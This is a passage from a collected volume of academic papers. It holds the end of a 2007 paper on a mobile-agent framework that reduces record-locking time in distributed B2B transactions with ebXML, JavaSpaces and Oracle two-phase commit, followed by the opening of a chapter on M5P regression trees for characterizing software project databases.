One core component of ebXML, the Collaboration Protocol Agreement (CPA), automates the technical aspects of a TPA. In ebXML, all trading partners publish a Collaboration Protocol Profile (CPP) that states a basic description of the ebXML business processes, as defined by an industry, that it supports, together with the industry's e-business systems points of access and technologies. Companies developing a CPA will match the business processes they support to prospective trading partners. The CPA allows trading partners to agree on a set of common processes and the messages that need to be exchanged to accommodate these business processes. Therefore, the CPA provides for the automatic generation of the TPA. Another initiative of ebXML was to address distributed B2B transactions in a heterogeneous environment, focusing on the extended record locking across organizational boundaries in long-running, distributed transactions. The long-running transaction is defined by Dan et al. (2001) as a long-running conversation in which trading partners negotiate and create an electronic contract that stipulates the terms of the transaction. The scope of the transaction state has been broadened to encompass requirements and semantics of the state of a business transaction as a measure of the transaction's progress and outcome. A key benefit of this approach is that it provides an extensible model of a transaction that is well suited for advanced transaction models, such as Flexible transactions, Interoperable transactions, and Mobile transactions. Here, "model" refers to a
methodology or sequence of operations. Although other benefits attributed to the ebXML approach include a solution for extended record locking, the ebXML approach does not define a transaction based upon the standard ACID properties. The ebXML solution is a heterogeneous solution that does not place requirements on the RM as to the state of its data during the scope of the transaction. The result of not basing a transaction on the state of its data has an effect on the atomicity and isolation properties of ACID. In ebXML, atomicity in a transaction can no longer be preserved via the standard two-phase commit protocol. The two-phase commit relies on specific constraints placed on the state of transactional data via the protocol during the transaction. The ebXML solution utilizes a two-phase agreement protocol, which is much like the two-phase commit protocol in that it coordinates the messaging required to allow a contractual agreement to be reached as to the outcome of the transaction. The agreement on the outcome of the distributed transaction is more contractual in nature, via the TPA, rather than being tied to transactional data states as in the standard two-phase commit protocol. Research has suggested relaxing the isolation property of ACID as an appropriate procedure in the reduction of record locking (Weigand, Verharen, & Dignum, 1997). In the ebXML solution there exists no guarantee on the isolation property of the transaction data in the scope of a transaction. This lack of isolation in the ebXML solution is by design and is directly attributed to the fact that an ebXML implementation makes no requirements on RMs as to their data state during a transaction.
METHODOLOGY
This section provides details of our mobile/intelligent agent framework: the goal of the framework is to directly address the issue of extended record locking by removing the linear progressive nature of current solutions to B2B distributed
transactions (described in the Background section). As mentioned in the introduction, an MA is software that moves itself from place to place in a network. An intelligent agent (IA) is software that has a particular goal and can act autonomously in certain situations. Our research shows that removing this linear progression substantially reduces the average record locking time of the B2B distributed transaction. The framework uses a two-phase commit protocol (Attaluri & Salem, 2002) to guarantee the atomicity property of the transaction. First, we provide an architectural overview of the framework and describe for each component its general properties as they relate to the business transaction. The following section details a typical trading partner interaction.
Mobile/Intelligent Agent Framework
First, we formalize the trading partner interaction to assure that this process is complete and meets the requirements of the business transaction. Weigand et al. (1997) formalize the interaction process between supplier and consumer into the following four stages:
1. Inquiry and negotiation stage
2. Contractual stage
3. Fulfillment stage
4. Satisfaction stage
We have adopted this model as a basis for trading partner interaction in our framework. Our inquiry and negotiation stage is a set of messages that facilitate an initial understanding of the scope and parameters of the trading partner interaction. This stage is the electronic counterpart of a bartering system in which humans interact to determine the parameters of a trade. The contractual stage provides a mechanism for an e-document exchange that provides all the e-documents necessary to finalize the business interaction. The contractual phase is the electronic
counterpart to a paper trail. The fulfillment stage actually provides the business transaction with the ability to exchange documents that state the transaction is completed and that resources have been allocated on each side to provide physical services. The satisfaction stage is a feedback mechanism designed for process improvement. The TPA aids the MA in conducting the interactions necessary to accomplish the first three stages in the business transaction. How this interaction model is implemented in our mobile/intelligent agent framework is discussed further below. Our mobile/intelligent agent framework design addresses the need to reduce record locking without relaxing the ACID properties of transaction-based systems. Although Dan et al. (2001) point out that we should not make assumptions about a trading partner's abilities, for many areas such as e-banking, the need for a trading partner to ensure that a transaction has truly completed as required leads to a desire for more insight into a trading partner's capabilities. Traditionally, having a trading partner implement the ACID properties was how such assurance was achieved.
This architecture assumes that each trading partner provides an interface to its enterprise applications and that the trading partners' systems are capable of ACID transactions. The focus of this research is to show that a reduction in record locking is possible for long-running distributed transactions without relaxing the ACID properties. This reduction in record locking is accomplished by allowing a set of MAs to work in a parallel manner to achieve each trading partner interaction required for the B2B distributed transaction. Our mobile/intelligent agent architecture, shown in Figure 2, has the following components: IA, MA, TPA(s), and a host execution environment (HEE). In the business transaction the IA acts on behalf of the purchaser to fulfill all of the requirements of the distributed transaction. The purchaser describes, through a front-end application, the requirements for all interactions with each trading partner that are contained in the transaction. The IA uses ebXML CPAs to match the services needed with potential trading partners. When all requirements have been matched with potential trading partners, the
Figure 2. Mobile/intelligent agent framework (IA, HEE, MAs, TPAs, RMs, and enterprise interfaces)
IA spawns a set of MAs, one for each interaction with a potential trading partner. These MAs are spawned to a shared distributed memory where each MA proceeds autonomously with its task. Each MA uses the TPA to carry out the interaction with this trading partner. The use of MAs allows us to remove the linear sequential aspect of most distributed B2B interactions. The parallel execution of MAs provides a significant improvement over sequential transactions.
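To make the parallelism concrete, the following minimal Java sketch (our own illustration, not code from the framework) shows an IA-like coordinator spawning one worker task per trading-partner interaction and waiting for all of them to report that they are prepared; names such as tradingPartnerTask are hypothetical.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.concurrent.*;

// Hypothetical illustration: each task plays the role of a mobile agent (MA)
// handling one trading-partner interaction; the coordinator plays the IA.
public class ParallelInteractionSketch {

    // Each "MA" reports true once its partner has locked records and is prepared to commit.
    static Callable<Boolean> tradingPartnerTask(final String partner) {
        return new Callable<Boolean>() {
            public Boolean call() {
                // negotiate, lock records, and run the prepare phase with 'partner' ...
                return true; // prepared
            }
        };
    }

    public static void main(String[] args) throws Exception {
        String[] partners = {"partner1", "partner2", "partner3"};
        ExecutorService pool = Executors.newFixedThreadPool(partners.length);
        List<Future<Boolean>> votes = new ArrayList<Future<Boolean>>();
        for (String p : partners) {
            votes.add(pool.submit(tradingPartnerTask(p))); // interactions run in parallel
        }
        boolean allPrepared = true;
        for (Future<Boolean> v : votes) {
            allPrepared &= v.get(); // wait for every "MA" to finish its prepare phase
        }
        System.out.println(allPrepared ? "commit" : "rollback");
        pool.shutdown();
    }
}
```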
Mobile/Intelligent Agent Framework Business Transaction Flow
This section details the transaction messaging required to allow an MA, working autonomously, to successfully complete a trading partner interaction. The IA creates the MA to conduct an individual trading partner interaction. The MA interacts with the enterprise application interface of the specified trading partner. The MA acting autonomously must carry out all stages of the trading partner interaction model defined in Figure 3. The trading partner business interaction model includes the following stages: initial/negotiation, contractual, and fulfillment.
(Figure 3 depicts the fulfillment-stage exchange between the mobile agent and the enterprise application interface: P.O. request and P.O. send, records locked, P.O. received, commit, and records unlocked.)
Implementation, Testing, and Results Our mobile/intelligent agent framework does not specify implementation-specific details for its core components; therefore, there are many ways to implement each component. We chose Sun Microsystems Java tm as the language for the framework core components’ implementation of the MA and the enterprise application interface. Sun Microsystems Jini tm is used as the distributed computing platform to facilitate the required message passing between all components. The tested framework also uses Oracle 9i DBMS as the chosen platform to represent the implementation of a trading partner’s enterprise application storage. Oracle 9i is capable of providing the requirements of the ACID properties in
a distributed transaction. The Oracle XA library conforms to the X/Open Distributed Transaction Processing (DTP) software architecture’s XA interface specification. The Oracle XA library is an external interface that allows distributed transactions to be coordinated by a transaction manager. In this section we describe the specific details of the test performed to quantify our hypothesis that on average the mobile/intelligent agent framework will significantly reduce record locking when compared with a linear progressive implementation. A description of the mobile/intelligent agent framework implementation used to test our hypothesis is provided for completeness.
Testing the hypothesis requires a test scenario that simulates each method of record locking, while capturing the amount of time records are locked on each trading partner's system. The focus of each test scenario is to simulate all aspects of the specific approach that have an impact on the length of time records are locked in the distributed transaction without relaxing the ACID properties. Therefore, for the purpose of this analysis, the implementations of the linear progressive method and the mobile/intelligent agent framework need only address record locking; other higher-level B2B interactions are irrelevant for the purpose of this experiment. The implementation that follows is intended to simulate all the message-passing requirements between the IA, the MA, and a trading partner's enterprise application necessary to implement an XOPEN two-phase commit. The simulation of the linear progressive method for distributed B2B transactions uses the native ability of the Oracle 9i database to perform distributed transactions, as it captures the true essence of the linear progressive approach. The simulation uses the Oracle database's ability to perform a two-phase commit, in which one database acts as the DTC while the remaining databases act as RMs in the transaction. To simulate the linear progressive approach, a Structured Query Language (SQL) script is invoked on one database server. The SQL script locks records on each database by performing an update to a set
of records. The SQL script required to achieve record locking is propagated in a linear fashion to each participant using Oracle 9i’s Database Link mechanism. When the last participant in the transaction achieves its record lock, the script issues a commit and the DTC performs the twophase commit. Figure 4 depicts the test scenario for the linear progressive simulation. This test implementation of the mobile/intelligent agent framework simulates the same distributed transaction previously accomplished by the linear progressive method. In the test implementation, the IA communicates with the enterprise application using Sun Microsystem’s Javaspace technology, a core component of Jini 2.0. The Javaspace is a Linda-like4 (Freeman, Hupfer, & Arnold, 1999) shared distributed memory that provides a synchronized message facility for this framework implementation. The Javaspace also provides an implementation of the Jini distributed events model that aids with synchronization of the message passing. The Javaspace can be used to implement a mobile-agent-based messaging requirement. A typical distributed transaction in this implementation of the framework would flow as follows (a more business level algorithmic description is provided in Appendix A): The Javaspace MA signals that the IA is ready to fulfill.
Figure 4. Simulation of the linear progressive method for distributed B2B transactions: an SQL script propagates record locks sequentially from DB 1 through DB 5
2. Upon receiving a fulfill message from all MAs, the IA writes one entry into the Javaspace for each trading partner interaction. These entries represent the fulfill/acknowledge message.
3. The Javaspace MA signals each enterprise application via Jini's distributed event mechanism.
4. After completion of the record locking and the prepare phase of the XOPEN two-phase commit, each enterprise application writes its entry into the Javaspace. This entry represents the acknowledge message of the two-phase commit protocol.
5. The Javaspace MA signals the IA via Jini's distributed event mechanism. The Javaspace signals once for each business interaction.
6. The IA waits to receive an acknowledge signal from each business partner participating in the distributed transaction. If the IA receives all acknowledgments within a specified time limit, the IA writes the commit entry to the Javaspace.
7. The Javaspace MA signals each enterprise application via Jini's distributed event mechanism.
8. Each enterprise application commits and releases its respective record locks.
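The sketch below mimics this fulfill/acknowledge/commit flow with a deliberately simplified, in-memory stand-in for the Javaspace (one blocking queue per entry type). It is our own illustration and does not use the actual Jini/JavaSpaces API; the entry names are hypothetical.

```java
import java.util.concurrent.*;

// Simplified illustration of the fulfill/acknowledge/commit exchange described above.
// A real implementation would write Javaspace entries and rely on Jini distributed events.
public class TwoPhaseFlowSketch {
    static final int PARTNERS = 3;
    static final BlockingQueue<String> fulfill = new LinkedBlockingQueue<String>();
    static final BlockingQueue<String> acks    = new LinkedBlockingQueue<String>();
    static final BlockingQueue<String> commits = new LinkedBlockingQueue<String>();

    public static void main(String[] args) throws Exception {
        // Each enterprise application: receive a fulfill entry, lock records and prepare, acknowledge.
        for (int i = 0; i < PARTNERS; i++) {
            final int id = i;
            new Thread(new Runnable() {
                public void run() {
                    try {
                        fulfill.take();                 // steps 2-3: fulfill entry arrives
                        // ... lock records and run the prepare phase ...
                        acks.put("ACK-" + id);          // step 4: write the acknowledge entry
                        commits.take();                 // steps 7-8: commit entry arrives
                        System.out.println("partner " + id + " committed, locks released");
                    } catch (InterruptedException e) { Thread.currentThread().interrupt(); }
                }
            }).start();
        }

        // The IA: write one fulfill entry per trading-partner interaction (step 2).
        for (int i = 0; i < PARTNERS; i++) fulfill.put("FULFILL-" + i);

        // Steps 5-6: wait for every acknowledgment within a time limit, then commit.
        boolean all = true;
        for (int i = 0; i < PARTNERS; i++) {
            all &= (acks.poll(5, TimeUnit.SECONDS) != null);
        }
        if (all) {
            for (int i = 0; i < PARTNERS; i++) commits.put("COMMIT");
        } else {
            System.out.println("timeout: abort");
        }
    }
}
```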
As discussed earlier, in the test implementation the Javaspace and Jini’s distributed events combine to perform the messaging requirement of an MA in the mobile/intelligent agent framework. Testing our hypothesis required measuring the lock time required by the linear progressive transaction method and comparing this to the lock time required by the mobile/intelligent agent framework transaction. In our test, we sampled 50 distributed transactions using each method. Each distributed transaction consisted of five trading partner interactions. The trading partner interaction required the locking of a single record on the Oracle 9i database that provided storage for the enterprise applications. Using Oracle’s LogMiner
Utility, we were able to recover the amount of time in seconds each record was locked on the five Oracle 9i databases from the active redo log files. The total lock time for the distributed transaction was the sum of the five partner interactions. The 50 distributed transactions were averaged to compute a mean for each method. To simulate both methods there were a total of six test machines, with one machine used to initiate the transaction, while the other five machines were running Oracle 9i. Each machine was running Windows 2000 Professional edition. Each of the test machines was a Pentium 4, with 512 megabytes of random access memory (RAM), running at 2.0 gigahertz. Table 2 shows a typical measurement for the distributed transaction using the linear progressive (Linear P) method and the mobile/intelligent agent framework (Mobile A). A two-sample t-test was used to compare the rating of the two sample means (the linear progressive transaction and the parallel MA). This tested the following hypothesis. Hypothesis •
• H0: ρ = 0 (null hypothesis). There is no significant difference between the linear progressive transaction and the mobile/intelligent agent framework transaction.
• H1: ρ ≠ 0 (alternative hypothesis). There is a significant difference between the linear progressive transaction and the mobile/intelligent agent framework transaction.
The two-sample t-test was used to indicate if there is a significant difference (at a 95% confi-
Table 2. Record lock time measurements (seconds)
Method      DB1   DB2   DB3   DB4   DB5
Linear P     6     5     5     4     3
Mobile A     3     3     4     3     3
Table 3. MINITAB two-sample t-test for linear progressive method versus mobile/intelligent agent
Two-sample T for Linear P vs. Mobile A
            N     Mean    StDev   SE Mean
Linear P    50    23.64   3.30    0.47
Mobile A    50    15.40   1.03    0.15
dence level) between the two sample means. When the means test indicates there is no significant difference between the linear progressive transaction and the mobile/intelligent agent framework transaction, this means that, on average, neither of the two transaction methods are different, subject to the confidence level of the test. When a test has a 95% confidence level, it means that if there were 100 comparisons between the linear progressive transaction and the mobile/intelligent agent framework transaction, there would be no significant difference in 95 out of the 100 comparisons. The two-sample t-test was run with MINITAB statistical software. Table 3 shows the MINITAB output for the two-sample t-test . The sample mean for the linear progressive (Linear P) and the mobile/intelligent agent (Mobile A) is 23.64 s and 15.40 s respectively. Subtracting the sample means yields an estimate of the difference of sample means of 8.240. The MINITAB output also shows that we are running the t-test with difference = 0, meaning that there is no significant difference between sample means (null hypothesis) versus the (alternative hypothesis) there is a significant difference between the sample means. The computed t-value of 16.86 with 58 df shows that there is less than .001 probability (p-value) that the population means are equal. Therefore, we must reject the null hypothesis, that the sample means are equal
at a significance level of .05 and accept the alternative hypothesis that there is a significant difference in the population means. Using a confidence interval (CI) to estimate the difference of the population means given these samples, the MINITAB output shows a 95% CI on the difference of 7.261 and 9.219. This CI states there is a probability of .95 that the difference between the means will be between 7.261 and 9.219. The CI agrees with our rejection of the null hypothesis that there is no significant difference between the sample means; therefore we accept the alternative that there is a significant difference in the population means. Note also that the 95% CI of (7.261, 9.219) does not contain 0, so the difference of the means, μ1 − μ2, is significantly different from 0.
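As a quick arithmetic check of the reported statistics (using only the values from Table 3), the snippet below recomputes the Welch two-sample t statistic and the approximate degrees of freedom; the small difference from the MINITAB t value is due to rounding of the standard errors.

```java
public class TTestCheck {
    public static void main(String[] args) {
        double mean1 = 23.64, se1 = 0.47;   // Linear P (n = 50)
        double mean2 = 15.40, se2 = 0.15;   // Mobile A (n = 50)
        double diff = mean1 - mean2;                       // estimated difference of means
        double se   = Math.sqrt(se1 * se1 + se2 * se2);    // standard error of the difference
        double t    = diff / se;                           // roughly 16.7 (reported: 16.86)
        double df   = Math.pow(se1 * se1 + se2 * se2, 2)
                    / (Math.pow(se1, 4) / 49 + Math.pow(se2, 4) / 49);  // Welch-Satterthwaite, about 58
        System.out.printf("diff=%.3f t=%.2f df=%.0f%n", diff, t, df);
    }
}
```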
DISCUSSION
These results show that there is a significant difference between the linear progressive method and the mobile/intelligent agent framework method. Estimating the time saved to be 7.261, the lower end of the CI, suggests that in the worst case an average savings of 30% on the record locking time was achieved by our framework compared to the linear progressive method. The best case average saving shown by this test, using the upper end of the CI, 9.219, suggests that a saving of 60% is possible under the tested scenario. However, one assumption of the test scenario for the linear progressive method was that all individual business interactions are fully specified by the front-end logistics application before any business interaction takes place. If, instead, the front-end application approaches each interaction one at a time (meaning the user specifies interaction 1 and the records are locked on vendor 1's system, then interaction 2 is specified by the user and records are locked on vendor 2's system, and so on), the worst case and best case average saving
would increase in proportion to the time it takes to specify all interactions other than the first.
CONCLUSION In summary, our research shows that retaining ACID properties in transactions is possible in a distributed B2B scenario by employing a method that greatly reduces record lock time. The recordlock test conducted with our framework proved to be a significant improvement over the traditional linear approach to distributed transactions. In the worst case, a 30% improvement was shown; in the best case, the improvement could be as much as 60%. The noted improvement is a result of the framework’s use of MAs working in parallel to accommodate individual trading partner interactions. Our mobile/intelligent agent framework makes use of ebXML’s CPA in order to allow MAs to autonomously negotiate individual business interactions. As agents complete the negotiation, each agent signals the IA, which is standing by, ready to fulfill the intended transaction with its trading partner. When all MAs have signaled they are ready to fulfill the transaction, the IA starts a standard two-phase commit. One benefit of our framework is that it reuses existing infrastructure such as databases that are capable of the two-phase commit. Therefore, companies would not need to implement a new distributed transaction protocol such as provided in the ebXML standard. In our implementation of the framework, this reuse is seen in the XOPEN distributed two-phase commit feature in the Oracle database. A secondary benefit attributed to the use of MAs and IAs in our framework is the ability to have a late binding to the atomicity property of the transaction. This is similar to ebXML’s ability to do a partial transaction with respect to the originating request. Therefore, the framework is capable of saving partial work that has been accomplished towards the goals of the transaction.
Our current experiment was chosen so that the improvement would be the least possible improvement in record locking from using our methodology; our expectation is that a typical operation in practice, as well as other experiments using our methodology, would achieve better results than were possible in our chosen experiment. However, we would be interested to see further experiments by other researchers validating our results. Although the mobile/intelligent agent framework has shown significant results in these test scenarios, future research will concentrate on advanced transaction models. Our research suggests that it is possible to reduce record locking without compromising the ACID properties. However, in the cases where extended record locks would not be allowed from a business perspective, we suggest setting an isolation level for these transactions as a possible alternative. Isolation levels are a standard part of an SQL transaction that allow different levels of read access to records that are currently locked. In order to accommodate the use of isolation levels in these transactions there are two options: first, we should consider the static binding that is achievable if we modify the CPA to allow the addition of an isolation level property as part of its specification. A second method, for achieving dynamic isolation levels, would be to allow this property to be incorporated as a Web service to be negotiated during the appropriate phase of the business transaction.
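Where an isolation level is negotiated instead of extended locks, a trading partner's enterprise interface could apply it through standard JDBC, as in the short sketch below; the connection URL and credentials are placeholders, and this is an illustration rather than part of the framework implementation.

```java
import java.sql.Connection;
import java.sql.DriverManager;

public class IsolationLevelExample {
    public static void main(String[] args) throws Exception {
        // Placeholder URL and credentials; any JDBC-compliant database applies here.
        Connection conn = DriverManager.getConnection(
                "jdbc:oracle:thin:@localhost:1521:orcl", "user", "password");
        try {
            // Allow other transactions to read committed data while this
            // long-running business transaction holds its locks.
            conn.setTransactionIsolation(Connection.TRANSACTION_READ_COMMITTED);
            conn.setAutoCommit(false);
            // ... perform the negotiated trading-partner work ...
            conn.commit();
        } finally {
            conn.close();
        }
    }
}
```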
REFERENCES American National Standards Institute. (1992). American national standards for information systems-database language- SQL. ANSI X3.1351992. Washington, D.C.: U.S. Government Printing Office.
Ariba Inc. (2006). cXML version 1.0 specification. Retrieved December 1, 2006, from http://www.cxml.org Attaluri, G., & Salem, K. (2002). The presumed-either two-phase commit protocol. IEEE Transactions on Knowledge and Data Engineering, 14(5), 1190-1196. Dan, A., Dias, D., Kearny, R., Lau, T., Nguyen, R., Parr, F., et al. (2001). Business-to-business integration with tpaML and a business-to-business protocol framework. IBM Systems Journal, 40(1), 68-90. Freeman, E., Hupfer, S., & Arnold, K. (1999). Javaspaces principles: Patterns and practice. Reading, MA: Addison-Wesley. Organization for the Advancement of Structured Information Standards (OASIS). (2002a). Business transaction protocol primer [Version 1.0]. Billerica, MA: Author.
Organization for the Advancement of Structured Information Standards (OASIS). (2002b). Business transaction protocol [Version 1.03]. Billerica, MA: Author. Riccardi, G. (2001). Principles of database systems with Internet and Java applications. Reading, MA: Addison-Wesley. Weigand, H., Heuvel, W. J., & Dignum, F. (1998). Modeling electronic commerce transactions: A layered approach. In Proceedings from LPCM ’98: Third International Workshop on the Language/Action Perspective on Communication Modeling (pp. 47-58). Weigand, H., Verharen, E. M., & Dignum, F. (1997). Dynamic business models as a basis for interoperable transaction design. Information Systems, 22(2,3), 139-154. Wooldridge, M. J., & Jennings, N. R. (1995). Intelligent agents: Theory and practice. Knowledge Engineering Review, 10(2), 115-152.
This work was previously published in Journal of Electronic Commerce in Organizations, Vol. 5, Issue 3, edited by M. Khosrow-Pour, pp. 52-67, copyright 2007 by IGI Publishing (an imprint of IGI Global).
Chapter 6.7
A Two-Stage Zone Regression Method for Global Characterization of a Project Database
J. J. Dolado, University of the Basque Country, Spain
D. Rodríguez, University of Reading, UK
J. Riquelme, University of Seville, Spain
F. Ferrer-Troyano, University of Seville, Spain
J. J. Cuadrado, University of Alcalá de Henares, Spain
ABSTRACT One of the problems found in generic project databases, where the data is collected from different organizations, is the large disparity of its instances. In this chapter, we characterize the database selecting both attributes and instances so that project managers can have a better global vision of the data they manage. To achieve that,
we first make use of data mining algorithms to create clusters. From each cluster, instances are selected to obtain a final subset of the database. The result of the process is a smaller database which maintains the prediction capability and has a lower number of instances and attributes than the original, yet allows us to produce better predictions.
INTRODUCTION Successful software engineering projects need to estimate and make use of past data since the inception of the project. In the last decade, several organizations have started to collect data so that companies without historical datasets can use these generic databases for estimation. In some cases, project databases are used to compare data from the organization with other industries, that is, benchmarking. Examples of such organizations collecting data include the International Software Benchmarking Standards Group (ISBSG, 2005) and the Software Technology Transfer Finland (STTF, 2004). One problem faced by project managers when using these datasets is that the large number of attributes and instances needs to be carefully selected before estimation or benchmarking in a specific organization. For example, the latest release of the ISBSG (2005) has more than 50 attributes and 3,000 instances collected from a large variety of organizations. The project manager has the problem of interpreting and selecting the most adequate instances. In this chapter, we propose an approach to reduce (characterize) such repositories using data mining as shown in Figure 1. The number of attributes is reduced mainly using expert knowledge although the data mining
Figure 1. Characterizing dataset for producing better estimates
algorithms can help us to identify the most relevant attributes in relation to the output parameter, that is, the attribute that wants to be estimated (e.g., work effort). The number of instances or samples in the dataset is reduced by selecting those that contribute to a better accuracy of the estimates after applying a version of the M5 (Quinlan, 1992) algorithm, called M5P, implemented in the Weka toolkit (Witten & Frank, 1999) to four datasets generated from the ISBSG repository. We compare the outputs before and after, characterizing the database using two algorithms provided by Weka, multivariate linear regression (MLR), and least median squares (LMS). This chapter is organized as follows: the Techniques Applied section presents the data mining algorithm; The Datasets section describes the datasets used; and the Evaluation of the Techniques and Characterization of Software Engineering Datasets section discusses the approach to characterize the database followed by an evaluation of the results. Finally, the Conclusions section ends the chapter.
TECHNIQUES APPLIED Many software engineering problems like cost estimation and forecasting can be viewed as classification problems. A classifier resembles a function in the sense that it attaches a value (or a range or a description), named the class, C, to a set of attribute values A1, A2,... An, that is, a classification function will assign a class to a set of descriptions based on the characteristics of the instances for each attribute. For example, as shown in Table 1, given the attributes size, complexity, and so forth, a classifier can be used to predict the effort. In this chapter, we have applied data mining, that is, computational techniques and tools designed to support the extraction, in an automatic way, of the information useful for decision support or exploration of the data source (Fayyad,
Table 1. Example of attributes and class in software engineering repository
A1 - Size    …    An - Complexity    C - Effort
a11          …    a1n                c1
…            …    …                  …
am1          …    amn                cn
Piatetsky-Shapiro, & Smyth, 1996). Since data may not be organized in a way that facilitates the extraction of useful information, typical data mining processes are composed of the following steps:
• Data Preparation: The data is formatted in a way that tools can manipulate it, merged from different databases, and so forth.
• Data Mining: It is in this step when the automated extraction of knowledge from the data is carried out. Examples of such algorithms and some usual representations include C4.5 or M5 for decision trees, regression, and so forth.
• Proper Interpretation of the Results: Including the use of visualization techniques.
• Assimilation of the Results.
Within the available data mining algorithms, we have used M5 and linear regression classifiers implemented in the Weka toolkit, which have been used to select instances of a software engineering repository. The next sub-sections explain these techniques in more detail.
M5 and M5P The main problem in linear regression is that the attributes must be numeric, so that the model obtained will also be numeric (simple equations in n dimensions). As a solution to this problem, deci-
sion trees have been used in data mining for a long time as a supervised learning technique (models are learned from data). A decision tree divides the attribute space into clusters with two main advantages. First, each cluster is clearly defined in the sense that new instances are easily assigned to a cluster (leaf of the tree). The second benefit is that the trees are easily understandable by users in general and by project managers in particular. Each branch of the tree has a condition which reads as follows: attribute ≤ value or attribute > value that serve to make selections until a leaf is reached. Such conditions are frequently used by experts in all sciences in decision making. Decision trees are divided into model trees in which each leaf represents the average value of the instances that are covered by the leaf and regression trees in which each leaf is a regression model. Examples of decision trees include a system called CART (Classification and Regression Trees) developed by Breiman (1984), ID3 (Quinlan, 1986) improved into C4.5 (Quinlan, 1993), and M5 (Quinlan, 1992) with the difference that in M5 the nodes represent linear regressions rather than discrete classes. The M5 algorithm, the most commonly used classifier of this family, builds regression trees whose leaves are composed of multivariate linear models, and the nodes of the tree are chosen over the attribute that maximizes the expected error reduction as a function of the standard deviation of output parameter. In this work, we have used the M5 algorithm implemented in the Weka toolkit (Witten & Frank, 1999), called M5P. Figure 2 shows Weka’s output for the M5P algorithm for one of the datasets that we used for this chapter. In this case, the M5P algorithm created 17 clusters, from LM1 to LM17. The normalized work effort (NormWorkEff ) is the dependent variable, and a different linear model is applied depending on the number of Function Points (FP) and productivity (NormPDR). The clusters found can assign to the dependent variable either a constant or a linear equation (in the majority of the cases); in this case,
each cluster or region is associated with linear equations (Figure 2, right column) In the example shown in Figure 2, the M5P algorithm created 17 leaves, and we will use FP and NormPDR to select the appropriate linear model. In this case, the tree generated is composed of a large number of leaves divided by the same variables at different levels. The tree could be simplified adding a restriction about the minimum number of instances covered by each leaf; for example, saying that there should be 100 instances per leaf will generate a simpler tree but less accurate.
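As an illustration of how such a model tree can be produced programmatically, the sketch below builds an M5P tree and prints its splits and leaf models. It assumes a recent Weka release in which M5P lives in weka.classifiers.trees, and the ARFF file name is a placeholder; the minimum-instances option corresponds to the leaf-size restriction mentioned above.

```java
import java.io.BufferedReader;
import java.io.FileReader;
import weka.classifiers.trees.M5P;
import weka.core.Instances;

public class BuildM5P {
    public static void main(String[] args) throws Exception {
        // Placeholder file name; the last attribute is the dependent variable (e.g., NormWorkEff).
        Instances data = new Instances(new BufferedReader(new FileReader("isbsg.arff")));
        data.setClassIndex(data.numAttributes() - 1);

        M5P tree = new M5P();
        tree.setMinNumInstances(100.0);  // require at least 100 instances per leaf (simpler tree)
        tree.buildClassifier(data);

        System.out.println(tree);        // prints the splits and the linear model at each leaf
    }
}
```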
Figure 3 also shows the tree in a graphical way. Each leaf of the tree provides further information within brackets. For example, for LM1, there are 308 instances and an approximate error in that leaf is 8.331%.
Constructing the M5 Decision Tree Regarding the construction of the tree, M5 needs three steps. The first step generates a regression tree using the training data. It calculates a linear model (using linear regression) for each node
of the tree generated. The second step tries to simplify the regression tree generated in the previous search (first post-pruning), deleting the nodes of the linear models whose attributes do not increase the error. The aim of the third step is to reduce the size of the tree without reducing the accuracy (second post-pruning). To increase efficiency, M5 does the last two steps at the same time, so that the tree is parsed only once; this simplifies both the number of nodes and the nodes themselves. As mentioned previously, M5 first calculates a regression tree that minimizes the variation of the values of the instances that fall into the leaves of the tree. Afterwards, it generates a linear model for each of the nodes of the tree. In the next step, it simplifies the linear models of each node by deleting those attributes that do not reduce the classification error when they are eliminated. Finally, it simplifies the regression tree by eliminating subtrees under the intermediate nodes, that is, the nodes whose classification error is greater than the classification error given by the linear model corresponding to those intermediate nodes. In this way, taking a set of learning instances E and a set of attributes A, a simplified version of the M5 algorithm is as follows:
Proc_M5(E, A)
begin
  R := create-node-tree-regression
  R := create-tree-regression(E, A, R)
  R := simplify-lineal-models(E, R)
  R := simplify-regression-tree(E, R)
  return R
end
The regression tree, R, is created in a divide-and-conquer method; the three functions (create-tree-regression, simplify-lineal-models and simplify-regression-tree) are called in a recursive way after creating regression tree node by (createnode-tree-regression). Once the tree has been built, a linear model for
each node is calculated and the leaves of the trees are pruned if the error decreases. The error for each node is the average of the difference between the predicted value and the actual value of each instance of the training set that reaches the node. This difference is calculated in absolute terms. This error is weighted according to the number of instances that reach that node. This process is repeated until all the examples are covered by one or more rules.
Transformation of Nominal Attributes Before building the tree, all non-numeric attributes are transformed into binary variables so that they can be treated as numeric attributes. A variable with k values is transformed into k-1 binary variables. This transformation is based on the Breiman observation. According to this observation, the best splitting in a node for a variable with k values is one of the k-1 possible solutions once the attributes have been sorted.
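A minimal sketch of this encoding (our own illustration): a nominal attribute with k values is replaced by k−1 indicator variables defined over the sorted list of its values.

```java
import java.util.Arrays;

public class BinaryEncodingSketch {
    // Encode a nominal value as k-1 indicators over the sorted list of possible values.
    static int[] encode(String value, String[] sortedValues) {
        int[] indicators = new int[sortedValues.length - 1];
        int pos = Arrays.asList(sortedValues).indexOf(value);
        for (int i = 0; i < indicators.length; i++) {
            indicators[i] = (pos > i) ? 1 : 0;   // 1 if the value lies after split point i
        }
        return indicators;
    }

    public static void main(String[] args) {
        String[] platforms = {"MF", "MR", "PC"};                      // k = 3 values
        System.out.println(Arrays.toString(encode("MR", platforms))); // [1, 0]
    }
}
```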
Missing Values A quite common problem with real datasets occurs when the value of a splitting attribute does not exist. Once the attribute is selected as a splitting variable to divide the dataset into subsets, the value of this attribute must be known. To solve this problem, the attribute whose value does not exist is replaced by the value of another attribute that is correlated to it. A simpler solution is to use the prediction value as the value of the attribute selected or the average value of the attribute for all the instances in the set that do not reach the node, but can be used as the value of the attribute.
Heuristics The split criterion of the branches in the tree in M5 is given by the heuristic used to select the best attribute in each new branch. For this task, M5 uses the standard deviation as a measure of the error
in each node. First, the error decrease for each attribute used as splitting point is calculated.
Smoothing In the final stage, a regularization process is made to compensate discontinuities among adjacent linear models in the leaves of the tree. This process is started once the tree has been pruned and especially for models based on training sets containing a small number of instances. This smoothing process usually improves the prediction obtained.
Linear Regression and Least Median Squares Linear regression (LR) is the classical linear regression model. It is assumed that there is a linear relationship between a dependent variable (e.g., effort) and a set of independent variables, that is, attributes (e.g., size in function points, team size, development platform, etc.). The aim is to adjust the data to a model so that
